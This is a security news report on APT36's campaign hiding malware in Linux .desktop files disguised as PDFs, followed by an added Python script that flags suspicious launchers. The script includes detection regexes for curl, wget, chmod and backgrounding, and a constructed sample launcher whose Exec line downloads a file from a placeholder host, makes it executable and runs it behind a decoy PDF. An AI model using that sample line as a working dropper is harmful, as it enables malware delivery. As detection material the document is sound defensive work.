APT36 Hackers Exploit .desktop Files on Linux in New Malware Campaign

Tuesday, August 26, 2025

The Pakistan-based hacker group APT36 has adopted a new tactic targeting Indian government and security agencies by abusing .desktop files on Linux systems. Normally used as simple shortcut launchers for applications, these files are now being leveraged to hide malware, enabling data theft and persistent access. According to cybersecurity firms CYFIRMA and CloudSEK, the campaign began on August 1, 2025, and remains active.

The attack begins with a phishing email containing a malicious ZIP file. Inside is a spoofed .desktop file, disguised to appear like a legitimate PDF document. When the victim opens the file, it triggers a hidden Bash command embedded in the Exec= field. This command downloads the malware payload from the attacker’s server or from Google Drive, modifies the file permissions to make it executable, and runs it silently in the background. Simultaneously, a decoy PDF opens in Firefox to avoid raising suspicion.

The malware itself is an ELF binary written in Go, designed to evade detection, maintain persistence via cron jobs or systemd, and communicate with a Command-and-Control (C2) server over two-way WebSocket connections.

Researchers noted the similarity to Windows-based LNK file attacks, where shortcut files are used to deliver malware. However, this Linux-specific tactic is particularly concerning because .desktop files are typically treated as harmless text files rather than executables. As a result, many security tools overlook them, making this a novel and stealthy attack vector. The evolution of APT36’s methods highlights their growing sophistication, aiming to evade detection and enhance espionage capabilities.
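The reason this vector slips past file-type-based controls is that a .desktop launcher is plain text in an INI-like layout, and a file manager renders only its Name and Icon while executing whatever is in Exec. A defender can triage these files with a few heuristics drawn from the behaviour described above. The following Python script is an added example, written for this page and not taken from the article or from the CYFIRMA or CloudSEK reports: it parses the [Desktop Entry] group, flags launchers whose Name or Icon masquerades as a document while Exec runs a shell one-liner that downloads, chmods and backgrounds something, and reports a viewer appearing next to that shell plumbing (the decoy-document pattern). The two sample launcher bodies, the hidden path and the URL are constructed placeholders, and the thresholds in is_suspicious are a judgement call rather than anything the researchers published.

```python
"""Heuristic triage of Linux .desktop launchers (added example, not from the article)."""
import re
import sys
from pathlib import Path
from typing import Dict, List

DOCUMENT_SUFFIXES = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt")
DOCUMENT_ICONS = ("pdf", "document", "office", "word", "spreadsheet")
VIEWERS = ("firefox", "xdg-open", "evince", "okular", "libreoffice")

# (label, regex) pairs applied to the Exec= value. Each is a weak signal on its own;
# a genuine launcher rarely trips more than one. The single-'&' test can false-positive
# on URLs with query strings, which is acceptable for triage.
EXEC_HEURISTICS = [
    ("runs a shell wrapper (sh/bash -c)", re.compile(r"\b(?:ba|da|z)?sh\s+-c\b")),
    ("invokes a network downloader (curl/wget)", re.compile(r"\b(?:curl|wget)\b")),
    ("marks a file executable (chmod)", re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]*7[0-7]*)\b")),
    ("backgrounds a process (&, nohup, setsid)", re.compile(r"(?<!&)&(?!&)|\bnohup\b|\bsetsid\b")),
    ("touches a temp or hidden path", re.compile(r"/tmp/|/\.[A-Za-z0-9_]")),
]


def parse_desktop(text: str) -> Dict[str, str]:
    """Return key->value pairs of the [Desktop Entry] group (comments and blanks skipped).

    Values keep everything after the first '=' so quoted shell text survives intact.
    """
    entry: Dict[str, str] = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def analyse(text: str) -> Dict[str, List[str]]:
    """Group findings into 'parse', 'masquerade' (looks like a document) and 'exec'."""
    result: Dict[str, List[str]] = {"parse": [], "masquerade": [], "exec": []}
    entry = parse_desktop(text)
    if not entry:
        result["parse"].append("no [Desktop Entry] group found")
        return result
    name, icon = entry.get("Name", ""), entry.get("Icon", "").lower()
    exec_line, entry_type = entry.get("Exec", ""), entry.get("Type", "")

    # The decoy: an Application entry presented with a document name or icon.
    if entry_type == "Application" and name.lower().endswith(DOCUMENT_SUFFIXES):
        result["masquerade"].append(f"Application entry named like a document: {name!r}")
    if entry_type == "Application" and exec_line and any(t in icon for t in DOCUMENT_ICONS):
        first_word = exec_line.split()[0].rsplit("/", 1)[-1]
        if first_word not in VIEWERS:
            result["masquerade"].append(f"document icon {icon!r} but Exec starts with {first_word!r}")

    for label, pattern in EXEC_HEURISTICS:
        if pattern.search(exec_line):
            result["exec"].append(f"Exec {label}")

    # A real viewer shortcut runs only the viewer; a viewer next to shell plumbing is the decoy.
    words = re.findall(r"[A-Za-z0-9_./-]+", exec_line)
    if result["exec"] and any(w.rsplit("/", 1)[-1] in VIEWERS for w in words):
        result["exec"].append("Exec opens a document viewer alongside shell plumbing (decoy pattern)")
    return result


def is_suspicious(text: str) -> bool:
    """Decision rule (author's choice): masquerade plus any Exec signal, or three Exec signals."""
    r = analyse(text)
    return (bool(r["masquerade"]) and bool(r["exec"])) or len(r["exec"]) >= 3


def scan_paths(root: str) -> Dict[str, Dict[str, List[str]]]:
    """Analyse every *.desktop under root; return findings for suspicious files only."""
    hits: Dict[str, Dict[str, List[str]]] = {}
    for path in Path(root).rglob("*.desktop"):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        if is_suspicious(text):
            hits[str(path)] = analyse(text)
    return hits


# Constructed samples for demonstration; the URL and paths are placeholders.
BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=accessories-text-editor
Terminal=false
"""
SUSPICIOUS = """[Desktop Entry]
Type=Application
Name=Report.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s https://example.invalid/placeholder -o /tmp/.x; chmod +x /tmp/.x; /tmp/.x & firefox /tmp/decoy.pdf"
"""

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else str(Path.home())
    for path, found in scan_paths(root).items():
        print(path)
        for line in found["parse"] + found["masquerade"] + found["exec"]:
            print("  -", line)
    print("constructed sample flagged:", is_suspicious(SUSPICIOUS))
```

Run it with a directory argument (for example the Desktop, Downloads or ~/.local/share/applications of a user who received a suspicious archive); without an argument it walks the home directory. Pair it with a file-association check: a desktop environment that refuses to launch .desktop files lacking the executable bit, or that prompts before running an untrusted launcher, removes the one-click path the campaign depends on.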

Source: https://www.bleepingcomputer.com/news/security/apt36-hackers-abuse-linux-desktop-files-to-install-malware/